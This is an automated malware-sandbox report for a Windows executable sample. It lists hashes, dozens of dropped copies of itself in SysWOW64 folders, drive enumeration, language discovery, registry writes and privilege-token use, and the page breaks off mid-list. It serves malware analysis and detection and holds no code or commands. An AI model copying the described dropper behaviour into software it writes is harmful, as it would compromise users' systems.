Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28/09/2024, 04:21
Behavioral task
behavioral1
Sample
fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
Resource
win7-20240708-en
windows7-x64
14 signatures
150 seconds
General
-
Target
fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
-
Size
86KB
-
MD5
fb7e4180110ac2917b6a1f816438c7b9
-
SHA1
392ae561ded6639279ceef98fe800538fc3eda76
-
SHA256
d7e299c1f844e0714d1e072f371c53929322fab99aa8fc9e73433f12994e1568
-
SHA512
e3b66b2e4a86fbb3cabe71c96dfa924c55b5d119c6cfcf0929f93bc2135dc401d35cbdc5772e9c6f6aef8a48cd4e0f2a9d311ddd3923c8cae47dcc5874fe453d
-
SSDEEP
1536:vKec0Px8LhsjgyFL3raHLASSPh5I+C1ORnD0e/PTPBeXFpNDp:yi8m0yJPD1C1qD0+Jef
Malware Config
Signatures
-
Executes dropped EXE 64 IoCs
pid Process 1676 BNO5lPp.exe 4540 nmbl12r.exe 924 nmbl12r.exe 4756 nmbl12r.exe 4952 nmbl12r.exe 2260 nmbl12r.exe 5084 nmbl12r.exe 2052 nmbl12r.exe 4480 nmbl12r.exe 2360 nmbl12r.exe 4960 nmbl12r.exe 1700 nmbl12r.exe 1544 nmbl12r.exe 3596 nmbl12r.exe 1804 nmbl12r.exe 4980 nmbl12r.exe 1672 nmbl12r.exe 1368 nmbl12r.exe 3524 nmbl12r.exe 4828 nmbl12r.exe 2232 nmbl12r.exe 3308 nmbl12r.exe 3164 nmbl12r.exe 4740 nmbl12r.exe 3056 nmbl12r.exe 3592 nmbl12r.exe 4164 nmbl12r.exe 1180 nmbl12r.exe 5080 nmbl12r.exe 4300 nmbl12r.exe 4940 nmbl12r.exe 3700 nmbl12r.exe 1960 nmbl12r.exe 864 nmbl12r.exe 4656 nmbl12r.exe 856 nmbl12r.exe 3184 nmbl12r.exe 2716 nmbl12r.exe 1800 nmbl12r.exe 4816 nmbl12r.exe 3340 nmbl12r.exe 1292 nmbl12r.exe 3856 nmbl12r.exe 3608 nmbl12r.exe 2464 nmbl12r.exe 1160 nmbl12r.exe 3744 nmbl12r.exe 5004 nmbl12r.exe 3740 nmbl12r.exe 4036 nmbl12r.exe 3764 nmbl12r.exe 4700 nmbl12r.exe 4208 nmbl12r.exe 1864 nmbl12r.exe 2132 nmbl12r.exe 4356 nmbl12r.exe 4812 nmbl12r.exe 3216 nmbl12r.exe 4608 nmbl12r.exe 4376 nmbl12r.exe 4392 nmbl12r.exe 4092 nmbl12r.exe 1136 nmbl12r.exe 4944 nmbl12r.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\g: nmbl12r.exe File opened (read-only) \??\x: nmbl12r.exe File opened (read-only) \??\e: nmbl12r.exe File opened (read-only) \??\s: nmbl12r.exe File opened (read-only) \??\p: nmbl12r.exe File opened (read-only) \??\u: nmbl12r.exe File opened (read-only) \??\o: nmbl12r.exe File opened (read-only) \??\v: nmbl12r.exe File opened (read-only) \??\x: nmbl12r.exe File opened (read-only) \??\o: nmbl12r.exe File opened (read-only) \??\z: nmbl12r.exe File opened (read-only) \??\u: nmbl12r.exe File opened (read-only) \??\z: nmbl12r.exe File opened (read-only) \??\n: nmbl12r.exe File opened (read-only) \??\m: nmbl12r.exe File opened (read-only) \??\x: nmbl12r.exe File opened (read-only) \??\l: nmbl12r.exe File opened (read-only) \??\g: nmbl12r.exe File opened (read-only) \??\g: nmbl12r.exe File opened (read-only) \??\o: nmbl12r.exe File opened (read-only) \??\p: nmbl12r.exe File opened (read-only) \??\z: nmbl12r.exe File opened (read-only) \??\i: nmbl12r.exe File opened (read-only) \??\y: nmbl12r.exe File opened (read-only) \??\h: nmbl12r.exe File opened (read-only) \??\u: nmbl12r.exe File opened (read-only) \??\x: nmbl12r.exe File opened (read-only) \??\g: nmbl12r.exe File opened (read-only) \??\h: nmbl12r.exe File opened (read-only) \??\h: nmbl12r.exe File opened (read-only) \??\q: nmbl12r.exe File opened (read-only) \??\o: nmbl12r.exe File opened (read-only) \??\m: nmbl12r.exe File opened (read-only) \??\t: nmbl12r.exe File opened (read-only) \??\g: nmbl12r.exe File opened (read-only) \??\e: nmbl12r.exe File opened (read-only) \??\e: nmbl12r.exe File opened (read-only) \??\p: nmbl12r.exe File opened (read-only) \??\e: nmbl12r.exe File opened (read-only) \??\j: nmbl12r.exe File opened (read-only) \??\s: nmbl12r.exe File opened (read-only) \??\l: nmbl12r.exe File opened (read-only) \??\q: nmbl12r.exe File opened (read-only) \??\r: nmbl12r.exe File opened (read-only) \??\o: nmbl12r.exe File opened (read-only) \??\j: nmbl12r.exe File opened (read-only) \??\t: nmbl12r.exe File opened (read-only) \??\y: nmbl12r.exe File opened (read-only) \??\j: nmbl12r.exe File opened (read-only) \??\m: nmbl12r.exe File opened (read-only) \??\p: nmbl12r.exe File opened (read-only) \??\r: nmbl12r.exe File opened (read-only) \??\g: nmbl12r.exe File opened (read-only) \??\t: nmbl12r.exe File opened (read-only) \??\t: nmbl12r.exe File opened (read-only) \??\j: nmbl12r.exe File opened (read-only) \??\j: nmbl12r.exe File opened (read-only) \??\g: nmbl12r.exe File opened (read-only) \??\g: nmbl12r.exe File opened (read-only) \??\r: nmbl12r.exe File opened (read-only) \??\h: nmbl12r.exe File opened (read-only) \??\t: nmbl12r.exe File opened (read-only) \??\x: nmbl12r.exe File opened (read-only) \??\e: nmbl12r.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\nmbl12r\g1xxCUY.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe File created C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exe nmbl12r.exe -
resource yara_rule behavioral2/memory/1676-5-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/files/0x000a00000002345f-4.dat upx behavioral2/memory/1676-19-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4540-23-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/924-25-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1804-31-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4952-30-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3596-28-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4756-27-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/2260-33-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/5084-35-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/2052-37-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4480-39-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/2360-41-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4960-43-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1700-45-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1544-47-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3596-49-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1804-51-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4980-53-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1672-55-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1368-57-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3524-59-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4828-61-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/2232-63-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3308-65-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3164-67-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4740-69-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3056-71-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3592-73-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4164-75-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1180-77-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/5080-79-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4300-81-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4940-83-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3700-85-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1960-87-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/864-89-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4656-91-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/856-93-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3184-95-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/2716-97-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1800-99-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4816-101-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3340-103-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1292-105-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3856-107-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3608-109-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/2464-111-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1160-113-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3744-115-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/5004-117-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3740-119-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4036-121-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3764-123-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4700-125-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4208-126-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/1864-127-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/2132-128-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4356-129-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4812-130-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/3216-131-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4608-132-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral2/memory/4376-133-0x0000000000400000-0x000000000044A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 29108 6636 Process not Found 5296 13240 Process not Found 4782 27620 18700 Process not Found 1029 18572 31988 Process not Found 12994 22164 17252 Process not Found 925 19564 23860 Process not Found 17616 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmbl12r.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{1AB45CBC-7D51-11EF-818E-62A6B307388A} = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31134045" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31134045" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4012183087" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4012183087" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31134045" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4013276992" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31134045" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4013276992" IEXPLORE.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3068 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 3068 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3068 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe Token: SeLoadDriverPrivilege 1676 BNO5lPp.exe Token: SeLoadDriverPrivilege 4540 nmbl12r.exe Token: SeLoadDriverPrivilege 924 nmbl12r.exe Token: SeLoadDriverPrivilege 4756 nmbl12r.exe Token: SeLoadDriverPrivilege 4952 nmbl12r.exe Token: SeLoadDriverPrivilege 2260 nmbl12r.exe Token: SeLoadDriverPrivilege 5084 nmbl12r.exe Token: SeLoadDriverPrivilege 2052 nmbl12r.exe Token: SeLoadDriverPrivilege 4480 nmbl12r.exe Token: SeLoadDriverPrivilege 2360 nmbl12r.exe Token: SeLoadDriverPrivilege 4960 nmbl12r.exe Token: SeLoadDriverPrivilege 1700 nmbl12r.exe Token: SeLoadDriverPrivilege 1544 nmbl12r.exe Token: SeLoadDriverPrivilege 3596 nmbl12r.exe Token: SeLoadDriverPrivilege 1804 nmbl12r.exe Token: SeLoadDriverPrivilege 4980 nmbl12r.exe Token: SeLoadDriverPrivilege 1672 nmbl12r.exe Token: SeLoadDriverPrivilege 1368 nmbl12r.exe Token: SeLoadDriverPrivilege 3524 nmbl12r.exe Token: SeLoadDriverPrivilege 4828 nmbl12r.exe Token: SeLoadDriverPrivilege 2232 nmbl12r.exe Token: SeLoadDriverPrivilege 3308 nmbl12r.exe Token: SeLoadDriverPrivilege 3164 nmbl12r.exe Token: SeLoadDriverPrivilege 4740 nmbl12r.exe Token: SeLoadDriverPrivilege 3056 nmbl12r.exe Token: SeLoadDriverPrivilege 3592 nmbl12r.exe Token: SeLoadDriverPrivilege 4164 nmbl12r.exe Token: 